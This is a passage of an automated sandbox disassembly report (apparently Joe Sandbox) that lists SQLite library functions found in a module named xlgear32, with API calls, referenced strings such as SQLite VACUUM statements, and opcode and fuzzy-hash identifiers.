                                                                          • Opcode Fuzzy Hash: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                          • Instruction Fuzzy Hash: 94F08CB5A002099BCB00DF2AD88088ABBBAFF98264B05952AEC049B314D770E941CBD0
                                                                          APIs
                                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925678
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1465156292-0
                                                                          • Opcode ID: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                                          • Instruction ID: bc2fa39936d9f4ed0ba1ebf98b65e017ff83ed2bbf5e058a49948814e7f33c49
                                                                          • Opcode Fuzzy Hash: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                                          • Instruction Fuzzy Hash: 59E0EC74A042089BCB04DF6AD4C194AB7F9EF58258B14D665EC458B309E231E9858BC1
                                                                          APIs
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 3064317574-0
                                                                          • Opcode ID: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                                          • Instruction ID: 7a9bf9350bb0d435b7485bd9c083abc2dab3a9c90cc7cce47300d03dda88f0d0
                                                                          • Opcode Fuzzy Hash: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                                          • Instruction Fuzzy Hash: FFD092B4909309AFCB00EF29C48644EBBE5AF98258F40C82DFC98C7314E274E8408F92
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                          • Instruction ID: 29002ccca7877ead4b7e7e784383ace88c03f26ddf616943a2b43c0eb71ea2e3
                                                                          • Opcode Fuzzy Hash: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                          • Instruction Fuzzy Hash: 36E0E2B850430DABDF00CF09D8C188A7BAAFB08364F10C119FC190B305C371E9548BA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                                          • Instruction ID: a276b763828cd9d21177d39229c24ef0f5c00ef14d0f26540801fec71d9d5410
                                                                          • Opcode Fuzzy Hash: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                                          • Instruction Fuzzy Hash: 29E0E2B850430DABDF00CF09D8C198A7BAAFB08264F10C119FC190B304C331E9148BE1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                          • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                                          • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                          • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                                          APIs
                                                                          • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                            • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                          • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                          • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                          • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                          • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                          • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                          • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                          • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                          • API String ID: 1320758876-2501389569
                                                                          • Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                          • Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
                                                                          • Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                          • Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                          • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                          • API String ID: 937752868-2111127023
                                                                          • Opcode ID: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                                          • Instruction ID: 65a1564e5812e901c47d2d0e8e64920046ae54dd737849fc0956122b524b53c9
                                                                          • Opcode Fuzzy Hash: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                                          • Instruction Fuzzy Hash: 19512C706187018FE700AF69D88575DBFF6AFA5708F10C81DE8999B214EB78C845DF42
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc$sqlite3_freesqlite3_vfs_find
                                                                          • String ID: @$access$cache
                                                                          • API String ID: 4158134138-1361544076
                                                                          • Opcode ID: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                          • Instruction ID: 35071b2ec389daa84eb338d99e29a1052eb2425681bc363379ff67fe3f9a0dd7
                                                                          • Opcode Fuzzy Hash: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                          • Instruction Fuzzy Hash: 27D19E75D183458BDB11CF69E58039EBBF7AFAA304F20846ED4949B349D339D882CB52
                                                                          APIs
                                                                          Strings
                                                                          • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                          • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                          • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                          • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                          • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                          • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                          • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                          • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                          • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                          • BEGIN;, xrefs: 609485DB
                                                                          • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                          • API String ID: 632333372-52344843
                                                                          • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                          • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                          • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                          • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                          APIs
                                                                            • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                            • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                            • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                            • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                            • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                            • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                            • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                          • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                          • sqlite3_free.SQLITE3 ref: 609605EA
                                                                          • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                          • sqlite3_free.SQLITE3 ref: 60960618
                                                                          • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                          • String ID: offsets
                                                                          • API String ID: 463808202-2642679573
                                                                          • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                          • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                          • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                          • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                          APIs
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                          • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                          • String ID:
                                                                          • API String ID: 2903785150-0
                                                                          • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                          • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                          • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                          • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_malloc
                                                                          • String ID:
                                                                          • API String ID: 423083942-0
                                                                          • Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                          • Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
                                                                          • Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                          • Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
                                                                          APIs
                                                                          • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                          • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                          • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                          • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                          • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                          • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                          • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                          • String ID:
                                                                          • API String ID: 3556715608-0
                                                                          • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                          • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                          • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                          • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                          APIs
                                                                          • sqlite3_malloc.SQLITE3 ref: 6095F645
                                                                          • sqlite3_exec.SQLITE3 ref: 6095F686
                                                                            • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                          • sqlite3_free_table.SQLITE3 ref: 6095F6A0
                                                                          • sqlite3_mprintf.SQLITE3 ref: 6095F6C7
                                                                            • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                            • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                          • sqlite3_free.SQLITE3 ref: 6095F6B4
                                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                          • sqlite3_free.SQLITE3 ref: 6095F6D4
                                                                          • sqlite3_free.SQLITE3 ref: 6095F6ED
                                                                          • sqlite3_free_table.SQLITE3 ref: 6095F6FF
                                                                          • sqlite3_realloc.SQLITE3 ref: 6095F71B
                                                                          • sqlite3_free_table.SQLITE3 ref: 6095F72D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
                                                                          • String ID:
                                                                          • API String ID: 1866449048-0
                                                                          • Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
